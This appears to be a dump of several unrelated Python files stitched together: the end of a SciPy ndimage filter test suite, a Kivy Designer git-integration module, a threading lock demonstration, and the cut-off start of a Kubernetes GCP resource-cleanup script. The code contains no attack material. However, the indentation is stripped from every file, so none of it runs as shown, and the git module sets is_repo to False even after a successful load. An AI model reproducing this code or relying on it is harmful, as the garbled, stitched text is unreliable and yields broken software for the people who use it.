out = sndi._ni_support._normalize_sequence(sigma, 1)
assert_equal(out, [sigma])
# This worked before; make sure it still works
sigma = [1, 1]
out = sndi._ni_support._normalize_sequence(sigma, 2)
assert_equal(out, sigma)
# Also include the OPs original example to make sure we fixed the issue
x = np.random.normal(size=(256, 256))
perlin = np.zeros_like(x)
for i in 2**np.arange(6):
perlin += sndi.filters.gaussian_filter(x, i, mode="wrap") * i**2
# This also fixes gh-4106, show that the OPs example now runs.
x = np.int64(21)
sndi._ni_support._normalize_sequence(x, 0)
def test_gaussian_kernel1d():
radius = 10
sigma = 2
sigma2 = sigma * sigma
x = np.arange(-radius, radius + 1, dtype=np.double)
phi_x = np.exp(-0.5 * x * x / sigma2)
phi_x /= phi_x.sum()
assert_allclose(phi_x, _gaussian_kernel1d(sigma, 0, radius))
assert_allclose(-phi_x * x / sigma2, _gaussian_kernel1d(sigma, 1, radius))
assert_allclose(phi_x * (x * x / sigma2 - 1) / sigma2,
_gaussian_kernel1d(sigma, 2, radius))
assert_allclose(phi_x * (3 - x * x / sigma2) * x / (sigma2 * sigma2),
_gaussian_kernel1d(sigma, 3, radius))
def test_orders_gauss():
# Check order inputs to Gaussians
arr = np.zeros((1,))
assert_equal(0, sndi.gaussian_filter(arr, 1, order=0))
assert_equal(0, sndi.gaussian_filter(arr, 1, order=3))
assert_raises(ValueError, sndi.gaussian_filter, arr, 1, -1)
assert_equal(0, sndi.gaussian_filter1d(arr, 1, axis=-1, order=0))
assert_equal(0, sndi.gaussian_filter1d(arr, 1, axis=-1, order=3))
assert_raises(ValueError, sndi.gaussian_filter1d, arr, 1, -1, -1)
def test_valid_origins():
"""Regression test for #1311."""
func = lambda x: np.mean(x)
data = np.array([1,2,3,4,5], dtype=np.float64)
assert_raises(ValueError, sndi.generic_filter, data, func, size=3,
origin=2)
func2 = lambda x, y: np.mean(x + y)
assert_raises(ValueError, sndi.generic_filter1d, data, func,
filter_size=3, origin=2)
assert_raises(ValueError, sndi.percentile_filter, data, 0.2, size=3,
origin=2)
for filter in [sndi.uniform_filter, sndi.minimum_filter,
sndi.maximum_filter, sndi.maximum_filter1d,
sndi.median_filter, sndi.minimum_filter1d]:
# This should work, since for size == 3, the valid range for origin is
# -1 to 1.
list(filter(data, 3, origin=-1))
list(filter(data, 3, origin=1))
# Just check this raises an error instead of silently accepting or
# segfaulting.
assert_raises(ValueError, filter, data, 3, origin=2)
def test_bad_convolve_and_correlate_origins():
"""Regression test for gh-822."""
# Before gh-822 was fixed, these would generate seg. faults or
# other crashes on many system.
assert_raises(ValueError, sndi.correlate1d,
[0, 1, 2, 3, 4, 5], [1, 1, 2, 0], origin=2)
assert_raises(ValueError, sndi.correlate,
[0, 1, 2, 3, 4, 5], [0, 1, 2], origin=[2])
assert_raises(ValueError, sndi.correlate,
np.ones((3, 5)), np.ones((2, 2)), origin=[0, 1])
assert_raises(ValueError, sndi.convolve1d,
np.arange(10), np.ones(3), origin=-2)
assert_raises(ValueError, sndi.convolve,
np.arange(10), np.ones(3), origin=[-2])
assert_raises(ValueError, sndi.convolve,
np.ones((3, 5)), np.ones((2, 2)), origin=[0, -2])
def test_multiple_modes():
# Test that the filters with multiple mode cababilities for different
# dimensions give the same result as applying a single mode.
arr = np.array([[1., 0., 0.],
[1., 1., 0.],
[0., 0., 0.]])
mode1 = 'reflect'
mode2 = ['reflect', 'reflect']
assert_equal(sndi.gaussian_filter(arr, 1, mode=mode1),
sndi.gaussian_filter(arr, 1, mode=mode2))
assert_equal(sndi.prewitt(arr, mode=mode1),
sndi.prewitt(arr, mode=mode2))
assert_equal(sndi.sobel(arr, mode=mode1),
sndi.sobel(arr, mode=mode2))
assert_equal(sndi.laplace(arr, mode=mode1),
sndi.laplace(arr, mode=mode2))
assert_equal(sndi.gaussian_laplace(arr, 1, mode=mode1),
sndi.gaussian_laplace(arr, 1, mode=mode2))
assert_equal(sndi.maximum_filter(arr, size=5, mode=mode1),
sndi.maximum_filter(arr, size=5, mode=mode2))
assert_equal(sndi.minimum_filter(arr, size=5, mode=mode1),
sndi.minimum_filter(arr, size=5, mode=mode2))
assert_equal(sndi.gaussian_gradient_magnitude(arr, 1, mode=mode1),
sndi.gaussian_gradient_magnitude(arr, 1, mode=mode2))
assert_equal(sndi.uniform_filter(arr, 5, mode=mode1),
sndi.uniform_filter(arr, 5, mode=mode2))
def test_multiple_modes_sequentially():
# Test that the filters with multiple mode cababilities for different
# dimensions give the same result as applying the filters with
# different modes sequentially
arr = np.array([[1., 0., 0.],
[1., 1., 0.],
[0., 0., 0.]])
modes = ['reflect', 'wrap']
expected = sndi.gaussian_filter1d(arr, 1, axis=0, mode=modes[0])
expected = sndi.gaussian_filter1d(expected, 1, axis=1, mode=modes[1])
assert_equal(expected,
sndi.gaussian_filter(arr, 1, mode=modes))
expected = sndi.uniform_filter1d(arr, 5, axis=0, mode=modes[0])
expected = sndi.uniform_filter1d(expected, 5, axis=1, mode=modes[1])
assert_equal(expected,
sndi.uniform_filter(arr, 5, mode=modes))
expected = sndi.maximum_filter1d(arr, size=5, axis=0, mode=modes[0])
expected = sndi.maximum_filter1d(expected, size=5, axis=1, mode=modes[1])
assert_equal(expected,
sndi.maximum_filter(arr, size=5, mode=modes))
expected = sndi.minimum_filter1d(arr, size=5, axis=0, mode=modes[0])
expected = sndi.minimum_filter1d(expected, size=5, axis=1, mode=modes[1])
assert_equal(expected,
sndi.minimum_filter(arr, size=5, mode=modes))
def test_multiple_modes_prewitt():
# Test prewitt filter for multiple extrapolation modes
arr = np.array([[1., 0., 0.],
[1., 1., 0.],
[0., 0., 0.]])
expected = np.array([[1., -3., 2.],
[1., -2., 1.],
[1., -1., 0.]])
modes = ['reflect', 'wrap']
assert_equal(expected,
sndi.prewitt(arr, mode=modes))
def test_multiple_modes_sobel():
# Test sobel filter for multiple extrapolation modes
arr = np.array([[1., 0., 0.],
[1., 1., 0.],
[0., 0., 0.]])
expected = np.array([[1., -4., 3.],
[2., -3., 1.],
[1., -1., 0.]])
modes = ['reflect', 'wrap']
assert_equal(expected,
sndi.sobel(arr, mode=modes))
def test_multiple_modes_laplace():
# Test laplace filter for multiple extrapolation modes
arr = np.array([[1., 0., 0.],
[1., 1., 0.],
[0., 0., 0.]])
expected = np.array([[-2., 2., 1.],
[-2., -3., 2.],
[1., 1., 0.]])
modes = ['reflect', 'wrap']
assert_equal(expected,
sndi.laplace(arr, mode=modes))
def test_multiple_modes_gaussian_laplace():
# Test gaussian_laplace filter for multiple extrapolation modes
arr = np.array([[1., 0., 0.],
[1., 1., 0.],
[0., 0., 0.]])
expected = np.array([[-0.28438687, 0.01559809, 0.19773499],
[-0.36630503, -0.20069774, 0.07483620],
[0.15849176, 0.18495566, 0.21934094]])
modes = ['reflect', 'wrap']
assert_almost_equal(expected,
sndi.gaussian_laplace(arr, 1, mode=modes))
def test_multiple_modes_gaussian_gradient_magnitude():
# Test gaussian_gradient_magnitude filter for multiple
# extrapolation modes
arr = np.array([[1., 0., 0.],
[1., 1., 0.],
[0., 0., 0.]])
expected = np.array([[0.04928965, 0.09745625, 0.06405368],
[0.23056905, 0.14025305, 0.04550846],
[0.19894369, 0.14950060, 0.06796850]])
modes = ['reflect', 'wrap']
calculated = sndi.gaussian_gradient_magnitude(arr, 1, mode=modes)
assert_almost_equal(expected, calculated)
def test_multiple_modes_uniform():
# Test uniform filter for multiple extrapolation modes
arr = np.array([[1., 0., 0.],
[1., 1., 0.],
[0., 0., 0.]])
expected = np.array([[0.32, 0.40, 0.48],
[0.20, 0.28, 0.32],
[0.28, 0.32, 0.40]])
modes = ['reflect', 'wrap']
assert_almost_equal(expected,
sndi.uniform_filter(arr, 5, mode=modes))
def test_gaussian_truncate():
# Test that Gaussian filters can be truncated at different widths.
# These tests only check that the result has the expected number
# of nonzero elements.
arr = np.zeros((100, 100), float)
arr[50, 50] = 1
num_nonzeros_2 = (sndi.gaussian_filter(arr, 5, truncate=2) > 0).sum()
assert_equal(num_nonzeros_2, 21**2)
num_nonzeros_5 = (sndi.gaussian_filter(arr, 5, truncate=5) > 0).sum()
assert_equal(num_nonzeros_5, 51**2)
# Test truncate when sigma is a sequence.
f = sndi.gaussian_filter(arr, [0.5, 2.5], truncate=3.5)
fpos = f > 0
n0 = fpos.any(axis=0).sum()
# n0 should be 2*int(2.5*3.5 + 0.5) + 1
assert_equal(n0, 19)
n1 = fpos.any(axis=1).sum()
# n1 should be 2*int(0.5*3.5 + 0.5) + 1
assert_equal(n1, 5)
# Test gaussian_filter1d.
x = np.zeros(51)
x[25] = 1
f = sndi.gaussian_filter1d(x, sigma=2, truncate=3.5)
n = (f > 0).sum()
assert_equal(n, 15)
# Test gaussian_laplace
y = sndi.gaussian_laplace(x, sigma=2, truncate=3.5)
nonzero_indices = np.nonzero(y != 0)[0]
n = nonzero_indices.ptp() + 1
assert_equal(n, 15)
# Test gaussian_gradient_magnitude
y = sndi.gaussian_gradient_magnitude(x, sigma=2, truncate=3.5)
nonzero_indices = np.nonzero(y != 0)[0]
n = nonzero_indices.ptp() + 1
assert_equal(n, 15)
class TestThreading(object):
def check_func_thread(self, n, fun, args, out):
from threading import Thread
thrds = [Thread(target=fun, args=args, kwargs={'output': out[x]}) for x in range(n)]
[t.start() for t in thrds]
[t.join() for t in thrds]
def check_func_serial(self, n, fun, args, out):
for i in range(n):
fun(*args, output=out[i])
def test_correlate1d(self):
d = np.random.randn(5000)
os = np.empty((4, d.size))
ot = np.empty_like(os)
self.check_func_serial(4, sndi.correlate1d, (d, np.arange(5)), os)
self.check_func_thread(4, sndi.correlate1d, (d, np.arange(5)), ot)
assert_array_equal(os, ot)
def test_correlate(self):
d = np.random.randn(500, 500)
k = np.random.randn(10, 10)
os = np.empty([4] + list(d.shape))
ot = np.empty_like(os)
self.check_func_serial(4, sndi.correlate, (d, k), os)
self.check_func_thread(4, sndi.correlate, (d, k), ot)
assert_array_equal(os, ot)
def test_median_filter(self):
d = np.random.randn(500, 500)
os = np.empty([4] + list(d.shape))
ot = np.empty_like(os)
self.check_func_serial(4, sndi.median_filter, (d, 3), os)
self.check_func_thread(4, sndi.median_filter, (d, 3), ot)
assert_array_equal(os, ot)
def test_uniform_filter1d(self):
d = np.random.randn(5000)
os = np.empty((4, d.size))
ot = np.empty_like(os)
self.check_func_serial(4, sndi.uniform_filter1d, (d, 5), os)
self.check_func_thread(4, sndi.uniform_filter1d, (d, 5), ot)
assert_array_equal(os, ot)
def test_minmax_filter(self):
d = np.random.randn(500, 500)
os = np.empty([4] + list(d.shape))
ot = np.empty_like(os)
self.check_func_serial(4, sndi.maximum_filter, (d, 3), os)
self.check_func_thread(4, sndi.maximum_filter, (d, 3), ot)
assert_array_equal(os, ot)
self.check_func_serial(4, sndi.minimum_filter, (d, 3), os)
self.check_func_thread(4, sndi.minimum_filter, (d, 3), ot)
assert_array_equal(os, ot)
def test_minmaximum_filter1d():
# Regression gh-3898
in_ = np.arange(10)
out = sndi.minimum_filter1d(in_, 1)
assert_equal(in_, out)
out = sndi.maximum_filter1d(in_, 1)
assert_equal(in_, out)
# Test reflect
out = sndi.minimum_filter1d(in_, 5, mode='reflect')
assert_equal([0, 0, 0, 1, 2, 3, 4, 5, 6, 7], out)
out = sndi.maximum_filter1d(in_, 5, mode='reflect')
assert_equal([2, 3, 4, 5, 6, 7, 8, 9, 9, 9], out)
#Test constant
out = sndi.minimum_filter1d(in_, 5, mode='constant', cval=-1)
assert_equal([-1, -1, 0, 1, 2, 3, 4, 5, -1, -1], out)
out = sndi.maximum_filter1d(in_, 5, mode='constant', cval=10)
assert_equal([10, 10, 4, 5, 6, 7, 8, 9, 10, 10], out)
# Test nearest
out = sndi.minimum_filter1d(in_, 5, mode='nearest')
assert_equal([0, 0, 0, 1, 2, 3, 4, 5, 6, 7], out)
out = sndi.maximum_filter1d(in_, 5, mode='nearest')
assert_equal([2, 3, 4, 5, 6, 7, 8, 9, 9, 9], out)
# Test wrap
out = sndi.minimum_filter1d(in_, 5, mode='wrap')
assert_equal([0, 0, 0, 1, 2, 3, 4, 5, 0, 0], out)
out = sndi.maximum_filter1d(in_, 5, mode='wrap')
assert_equal([9, 9, 4, 5, 6, 7, 8, 9, 9, 9], out)
def test_uniform_filter1d_roundoff_errors():
# gh-6930
in_ = np.repeat([0, 1, 0], [9, 9, 9])
for filter_size in range(3, 10):
out = sndi.uniform_filter1d(in_, filter_size)
assert_equal(out.sum(), 10 - filter_size)
def test_footprint_all_zeros():
# regression test for gh-6876: footprint of all zeros segfaults
arr = np.random.randint(0, 100, (100, 100))
kernel = np.zeros((3, 3), bool)
with assert_raises(ValueError):
sndi.maximum_filter(arr, footprint=kernel)
def test_gaussian_filter():
# Test gaussian filter with np.float16
# gh-8207
data = np.array([1],dtype = np.float16)
sigma = 1.0
with assert_raises(RuntimeError):
sndi.gaussian_filter(data,sigma)
def test_rank_filter_noninteger_rank():
# regression test for issue 9388: ValueError for
# non integer rank when performing rank_filter
arr = np.random.random((10, 20, 30))
assert_raises(TypeError, rank_filter, arr, 0.5,
footprint=np.ones((1, 1, 10), dtype=bool))
def test_size_footprint_both_set():
# test for input validation, expect user warning when
# size and footprint is set
with suppress_warnings() as sup:
sup.filter(UserWarning,
"ignoring size because footprint is set")
arr = np.random.random((10, 20, 30))
rank_filter(arr, 5, size=2, footprint=np.ones((1, 1, 10), dtype=bool))
|
git_integration.py | __all__ = ['RemoteProgress', 'GitRemoteProgress', 'DesignerGit']
from uix.action_items import DesignerActionSubMenu, DesignerSubActionButton
from components.designer_content import DesignerCloseableTab
from uix.settings import SettingListContent
from uix.py_code_input import PyScrollView
from uix.input_dialog import InputDialog
from utils.utils import (
FakeSettingList, get_current_project,
get_designer, get_kd_dir, show_message,
ignore_proj_watcher, show_alert,
)
import os
os.environ["GIT_PYTHON_REFRESH"] = "quiet"
from git import GitCommandError, RemoteProgress, Repo
from git.exc import InvalidGitRepositoryError
from kivy.properties import ObjectProperty, StringProperty
from kivy.core.window import Window
from kivy.uix.label import Label
from kivy.uix.actionbar import ActionButton
from kivy.uix.popup import Popup
from kivy.clock import Clock
from kivy.metrics import dp
from pygments.lexers.diff import DiffLexer
import threading, subprocess
from io import open
class RemoteProgress(Label):
pass
class GitRemoteProgress(RemoteProgress):
label = None
text = ''
def __init__(self):
super(GitRemoteProgress, self).__init__()
self.label = Label(text='')
self.label.padding = [10, 10]
def update(self, op_code, cur_count, max_count=None, message=''):
max_vl = (max_count or 100.0)
msg = message.replace(',', '').strip()
self.text = f"Progress: {str(cur_count/max_vl):2f} ({cur_count} of {max_vl})\n{msg}"
def update_text(self, *args):
'''Update the label text
'''
if self.text:
self.label.text = self.text
def start(self):
'''Start the label updating in a separated thread
'''
Clock.schedule_interval(self.update_text, 0.2)
def stop(self):
'''Start the label updating in a separated thread
'''
Clock.unschedule(self.update_text)
class DesignerGit(DesignerActionSubMenu):
is_repo = ObjectProperty(False)
'''Indicates if it's representing a valid git repository
:data:`is_repo` is a :class:`~kivy.properties.BooleanProperty`, defaults
to False.
'''
path = StringProperty('')
'''Project path
:data:`path` is a :class:`~kivy.properties.StringProperty`,
defaults to ''.
'''
repo = ObjectProperty(None)
'''Instance of Git repository.
:data:`repo` is a :class:`~kivy.properties.ObjectProperty`, defaults
to None.
'''
diff_code_input = ObjectProperty(None)
'''Instance of PyCodeInput with Git diff
:data:`diff_code_input` is a :class:`~kivy.properties.ObjectProperty`,
defaults to None.
'''
__events__ = ('on_branch', )
def __init__(self, **kwargs):
super(DesignerGit, self).__init__(**kwargs)
self._update_menu()
def load_repo(self, path):
'''Load a git/non-git repo from path
:param path: project path
'''
self.path = path
try:
self.repo = Repo(path)
self.is_repo = True
branch_name = self.repo.active_branch.name
self.dispatch('on_branch', branch_name)
if os.name in ('posix', 'nt'):
script = os.path.join(get_kd_dir(), 'tools', 'ssh-agent', 'ssh.sh')
self.repo.git.update_environment(GIT_SSH_COMMAND=script)
except InvalidGitRepositoryError:
self.is_repo = False
self.is_repo = False
self._update_menu()
def _update_menu(self, *args):
'''Update the Git ActionSubMenu content.
If a valid repo is open, git tools will be available.
Is not a git repo, git init is available.
'''
self.remove_children()
d = get_designer()
loader = get_current_project().path if d else None
if not loader:
self.disabled = True
return None
self.disabled = False
if self.is_repo:
btn_commit = DesignerSubActionButton(text='Commit')
btn_commit.bind(on_press=self.do_commit)
btn_add = DesignerSubActionButton(text='Add...')
btn_add.bind(on_press=self.do_add)
btn_branches = DesignerSubActionButton(text='Branches...')
btn_branches.bind(on_press=self.do_branches)
btn_diff = DesignerSubActionButton(text='Diff')
btn_diff.bind(on_press=self.do_diff)
btn_push = DesignerSubActionButton(text='Push')
btn_push.bind(on_press=self.do_push)
btn_pull = DesignerSubActionButton(text='Pull')
btn_pull.bind(on_press=self.do_pull)
self.add_widget(btn_commit)
self.add_widget(btn_add)
self.add_widget(btn_branches)
self.add_widget(btn_diff)
self.add_widget(btn_push)
self.add_widget(btn_pull)
else:
btn_init = DesignerSubActionButton(text='Init repo')
btn_init.bind(on_press=self.do_init)
self.add_widget(btn_init)
self._add_widget()
def validate_remote(self):
'''Validates Git remote auth. If system if posix, returns True.
If on NT, reads tools/ssh-agent/ssh_status.txt, if equals 1,
returns True else runs the tools/ssh-agent/ssh.bat and returns False
'''
if os.name == 'nt':
script = os.path.join(get_kd_dir(), 'tools', 'ssh-agent', 'ssh.bat')
status_txt = os.path.join(get_kd_dir(), 'tools', 'ssh-agent', 'ssh_status.txt')
with open(status_txt, 'r', encoding='utf-8') as file:
status = file.read()
file.close()
status = status.strip()
if status == '1':
return True
else:
subprocess.call(script, shell=True)
return False
return True
@ignore_proj_watcher
def do_init(self, *args):
'''Git init
'''
try:
self.repo = Repo.init(self.path, mkdir=False)
self.repo.index.commit('Init commit')
self.is_repo = True
self._update_menu()
show_message('Git repo initialized', 5, 'info')
except Exception:
show_alert('Git Init', 'Failted to initialize repo!')
def do_commit(self, *args):
'''Git commit
'''
d = get_designer()
toll_bar_top = d.ids.toll_bar_top
if toll_bar_top.popup:
return False
input_dlg = InputDialog('Commit message: ')
toll_bar_top.popup = Popup(
title='Git Commit', content=input_dlg, auto_dismiss=False,
size_hint=(None, None), size=('300pt', '150pt'),
)
input_dlg.bind(
on_confirm=self._perform_do_commit,
on_cancel=toll_bar_top.close_popup,
)
toll_bar_top.popup.open()
return True
@ignore_proj_watcher
def _perform_do_commit(self, input, *args):
'''Perform the git commit with data from InputDialog
'''
message = input.user_input.text
if self.repo.is_dirty():
try:
self.repo.git.commit('-am', message)
show_message(f'Commit: {message}', 5, 'info')
except GitCommandError as e:
show_alert('Git Commit', f'Failed to commit!\n{e}')
else:
show_alert('Git Commit', 'There is nothing to commit')
get_designer().ids.toll_bar_top.close_popup()
@ignore_proj_watcher
def do_add(self, *args):
'''Git select files from a list to add
'''
d = get_designer()
toll_bar_top = d.ids.toll_bar_top
if toll_bar_top.popup:
return False
files = self.repo.untracked_files
if not files:
show_alert('Git Add', 'All files are already indexed by Git')
return None
# create the popup
fake_setting = FakeSettingList()
fake_setting.allow_custom = False
fake_setting.items = files
fake_setting.desc = 'Select files to add to Git index'
content = SettingListContent(setting=fake_setting)
popup_width = min(0.95 * Window.width, dp(500))
popup_height = min(0.95 * Window.height, dp(500))
popup = Popup(
content=content, title='Git - Add files', size_hint=(None, None),
size=(popup_width, popup_height), auto_dismiss=False)
content.bind(
on_apply=self._perform_do_add,
on_cancel=toll_bar_top.close_popup)
content.show_items()
toll_bar_top.popup = popup
popup.open()
@ignore_proj_watcher
def _perform_do_add(self, instance, selected_files, *args):
'''Add the selected files to git index
'''
try:
self.repo.index.add(selected_files)
show_message(f'{len(selected_files)} file(s) added to Git index', 5, 'info')
get_designer().ids.toll_bar_top.close_popup()
except GitCommandError as e:
show_alert('Git Add', f'Failed to add files to Git!\n{e}')
def do_branches(self, *args):
'''Shows a list of git branches and allow to change the current one
'''
d = get_designer()
toll_bar_top = d.ids.toll_bar_top
if toll_bar_top.popup:
return False
branches = []
for b in self.repo.heads:
branches.append(b.name)
# create the popup
fake_setting = FakeSettingList()
fake_setting.allow_custom = True
fake_setting.items = branches
fake_setting.desc = 'Checkout to the selected branch. \nYou can type a name to create a new branch'
fake_setting.group = 'git_branch'
content = SettingListContent(setting=fake_setting)
popup_width = min(0.95 * Window.width, dp(500))
popup_height = min(0.95 * Window.height, dp(500))
popup = Popup(
content=content, title='Git - Branches', size_hint=(None, None),
size=(popup_width, popup_height), auto_dismiss=False)
content.bind(
on_apply=self._perform_do_branches,
on_cancel=toll_bar_top.close_popup)
content.selected_items = [self.repo.active_branch.name]
content.show_items()
toll_bar_top.popup = popup
popup.open()
@ignore_proj_watcher
def _perform_do_branches(self, instance, branches, *args):
'''If the branch name exists, try to checkout. If a new name, create
the branch and checkout.
If the code has modification, shows an alert and stops
'''
get_designer().ids.toll_bar_top.close_popup()
if self.repo.is_dirty():
show_alert('Git checkout', 'Please, commit your changes before switch branches.')
return None
if not branches:
return None
branch = branches[0]
try:
if branch in self.repo.heads:
self.repo.heads[branch].checkout()
else:
self.repo.create_head(branch)
self.repo.heads[branch].checkout()
branch_name = self.repo.active_branch.name
self.dispatch('on_branch', branch_name)
except GitCommandError as e:
show_alert('Git Branches', f'Failed to switch branch!\n{e}')
def on_branch(self, *args):
'''Dispatch the branch name
'''
pass
def do_diff(self, *args):
'''Open a CodeInput with git diff
'''
diff = self.repo.git.diff()
if not diff:
diff = 'Empty diff'
d = get_designer()
panel = d.designer_content.tab_pannel
# check if diff is visible on tabbed panel.
# if so, update the text content
for i, code_input in enumerate(panel.tab_list):
if code_input == self.diff_code_input:
panel.switch_to(panel.tab_list[len(panel.tab_list) - i - 2])
code_input.content.code_input.text = diff
return None
# if not displayed, create or add it to the screen
if self.diff_code_input is None:
panel_item = DesignerCloseableTab(title='Git diff')
panel_item.bind(on_close=panel.on_close_tab)
scroll = PyScrollView()
_py_code_input = scroll.code_input
_py_code_input.text = diff
_py_code_input.path = ''
_py_code_input.readonly = True
_py_code_input.lexer = DiffLexer()
_py_code_input.saved = True
panel_item.content = scroll
panel_item.rel_path = ''
self.diff_code_input = panel_item
else:
self.diff_code_input.content.code_input.text = diff
panel.add_widget(self.diff_code_input)
panel.switch_to(panel.tab_list[0])
def do_push(self, *args):
'''Open a list of remotes to push repository data.
If there is not remote, shows an alert
'''
d = get_designer()
toll_bar_top = d.ids.toll_bar_top
if toll_bar_top.popup:
return False
if not self.validate_remote():
show_alert('Git - Remote Authentication To use Git remote you need to enter your ssh password')
return None
remotes = []
for r in self.repo.remotes:
remotes.append(r.name)
if not remotes:
show_alert('Git Push Remote', 'There is no git remote configured!')
return None
# create the popup
fake_setting = FakeSettingList()
fake_setting.allow_custom = False
fake_setting.items = remotes
fake_setting.desc = 'Push data to the selected remote'
fake_setting.group = 'git_remote'
content = SettingListContent(setting=fake_setting)
popup_width = min(0.95 * Window.width, dp(500))
popup_height = min(0.95 * Window.height, dp(500))
popup = Popup(
content=content, title='Git - Push Remote', size_hint=(None, None),
size=(popup_width, popup_height), auto_dismiss=False)
content.bind(
on_apply=self._perform_do_push,
on_cancel=toll_bar_top.close_popup)
content.selected_items = [remotes[0]]
content.show_items()
toll_bar_top.popup = popup
popup.open()
def _perform_do_push(self, instance, remotes, *args):
'''Try to perform a push
'''
remote = remotes[0]
remote_repo = self.repo.remotes[remote]
progress = GitRemoteProgress()
status = Popup(
title='Git push progress', content=progress.label,
size_hint=(None, None), size=(dp(500), dp(200)))
status.open()
@ignore_proj_watcher
def push(*args):
'''Do a push in a separated thread
'''
try:
remote_repo.push(self.repo.active_branch.name, progress=progress)
def set_progress_done(*args):
progress.label.text = 'Completed!'
Clock.schedule_once(set_progress_done, 1)
progress.stop()
show_message('Git remote push completed!', 5, 'info')
except GitCommandError as e:
progress.label.text = f'Failed to push!\n{e}'
show_message('Failed to push', 5, 'error')
get_designer().ids.toll_bar_top.close_popup()
progress.start()
threading.Thread(target=push).start()
def do_pull(self, *args):
'''Open a list of remotes to pull remote data.
If there is not remote, shows an alert
'''
d = get_designer()
toll_bar_top = d.ids.toll_bar_top
if toll_bar_top.popup:
return False
if not self.validate_remote():
msg = 'To use Git remote you need to enter your ssh password'
show_alert('Git - Remote Authentication', msg)
return None
remotes = []
for r in self.repo.remotes:
remotes.append(r.name)
if not remotes:
show_alert('Git Pull Remote', 'There is no git remote configured!')
return None
# create the popup
fake_setting = FakeSettingList()
fake_setting.allow_custom = False
fake_setting.items = remotes
fake_setting.desc = 'Pull data from the selected remote'
fake_setting.group = 'git_remote'
content = SettingListContent(setting=fake_setting)
popup_width = min(0.95 * Window.width, dp(500))
popup_height = min(0.95 * Window.height, dp(500))
popup = popup = Popup(
content=content, title='Git - Pull Remote',
size_hint=(None, None), auto_dismiss=False,
size=(popup_width, popup_height))
content.bind(
on_apply=self._perform_do_pull,
on_cancel=toll_bar_top.close_popup)
content.selected_items = [remotes[0]]
content.show_items()
toll_bar_top.popup = popup
popup.open()
def _perform_do_pull(self, instance, remotes, *args):
'''Try to perform a pull
'''
remote = remotes[0]
remote_repo = self.repo.remotes[remote]
progress = GitRemoteProgress()
status = Popup(
title='Git pull progress',
content=progress.label,
size_hint=(None, None),
size=(dp(500), dp(200)))
status.open()
@ignore_proj_watcher
def pull(*args):
'''Do a pull in a separated thread
'''
try:
remote_repo.pull(progress=progress)
def set_progress_done(*args):
progress.label.text = 'Completed!'
Clock.schedule_once(set_progress_done, 1)
progress.stop()
show_message('Git remote pull completed!', 5)
except GitCommandError as e:
progress.label.text = f'Failed to pull!\n{e}'
get_designer().ids.toll_bar_top.close_popup()
progress.start()
threading.Thread(target=pull).start()
|
locks_doesnot_lock_any_thing.py |
"""
A primitive lock is in one of two states, "locked" or "unlocked". It is created in the
unlocked state. It has two basic methods, acquire() and release(). When the state is unlocked,
acquire() changes the state to locked and returns immediately. When the state is locked, acquire()
blocks until a call to release() in another thread changes it to unlocked, then the acquire()
call resets it to locked and returns. The release() method should only be called in the locked
state; it changes the state to unlocked and returns immediately. If an attempt is made to release
an unlocked lock, a RuntimeError will be raised.
note 1 :if thread call acquired and then it acquired the lock if it call acquired again before realse
it will block because the second acquired is waiting for the state to be unlocked
note 2 :acquire has defult bool args that either make it block or not and a timeout for how time
it will wait for the lock , and return true if it acquired and false if not in case its specified
to be not blocking
"""
from threading import Lock ,Thread ,enumerate,main_thread
import time
lock = Lock()
num = 1
def sumOne():
global num
s=lock.acquire()
print("sum one acquire the lock",s)
time.sleep(1) # make it sleep so the other thread go and run ,and bypass the lock
num = num + 1
try:
lock.release()
print("not realsed 1")
except:
pass
def sumTwo():
global num
s=lock.acquire(0)
print("sum two bypass acquire the lock",s)
num = num / 2
lock.release()
print('sum two relased the lock')
#it can realse it neverless its not the one that aquire it ,not like rlock which only can be released by the thread that acquire it
#so when sumone thread continue it will throw an error when it try to relase the lock
# calling the functions
Thread(target=sumOne).start()
Thread(target=sumTwo).start()
main_thread=main_thread()
for thread in enumerate():
if thread !=main_thread:
thread.join()
# displaying the value of shared resource
print(num)
|
gcp_janitor.py | #!/usr/bin/env python
# Copyright 2016 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Clean up resources from gcp projects. """
import argparse
import collections
import datetime
import json
import os
import subprocess
import sys
import threading
# A resource that need to be cleared.
Resource = collections.namedtuple(
'Resource', 'api_version group name subgroup condition managed tolerate bulk_delete')
DEMOLISH_ORDER = [
# [WARNING FROM KRZYZACY] : TOUCH THIS WITH CARE!
# ORDER REALLY MATTERS HERE!
# compute resources
Resource('', 'compute', 'instances', None, 'zone', None, False, True),
Resource('', 'compute', 'addresses', None, 'region', None, False, True),
Resource('', 'compute', 'disks', None, 'zone', None, False, True),
Resource('', 'compute', 'disks', None, 'region', None, False, True),
Resource('', 'compute', 'firewall-rules', None, None, None, False, True),
Resource('', 'compute', 'routes', None, None, None, False, True),
Resource('', 'compute', 'forwarding-rules', None, None, None, False, True),
Resource('beta', 'compute', 'forwarding-rules', None, 'region', None, False, True),
Resource('', 'compute', 'target-http-proxies', None, None, None, False, True),
Resource('beta', 'compute', 'target-http-proxies', None, 'region', None, False, True),
Resource('', 'compute', 'target-https-proxies', None, None, None, False, True),
Resource('beta', 'compute', 'target-https-proxies', None, 'region', None, False, True),
Resource('', 'compute', 'target-tcp-proxies', None, None, None, False, True),
Resource('beta', 'compute', 'target-tcp-proxies', None, 'region', None, False, True),
Resource('', 'compute', 'target-tcp-proxies', None, None, None, False, True),
Resource('beta', 'compute', 'target-tcp-proxies', None, 'region', None, False, True),
Resource('', 'compute', 'ssl-certificates', None, None, None, False, True),
Resource('beta', 'compute', 'ssl-certificates', None, 'region', None, False, True),
Resource('', 'compute', 'url-maps', None, None, None, False, True),
Resource('beta', 'compute', 'url-maps', None, 'region', None, False, True),
Resource('', 'compute', 'backend-services', None, 'region', None, False, True),
Resource('', 'compute', 'target-pools', None, 'region', None, False, True),
Resource('', 'compute', 'health-checks', None, None, None, False, True),
Resource('beta', 'compute', 'health-checks', None, 'region', None, False, True),
Resource('', 'compute', 'http-health-checks', None, None, None, False, True),
Resource('', 'compute', 'instance-groups', None, 'zone', 'Yes', False, True),
Resource('', 'compute', 'instance-groups', None, 'zone', 'No', False, True),
Resource('', 'compute', 'instance-templates', None, None, None, False, True),
Resource('', 'compute', 'sole-tenancy', 'node-groups', 'zone', None, False, True),
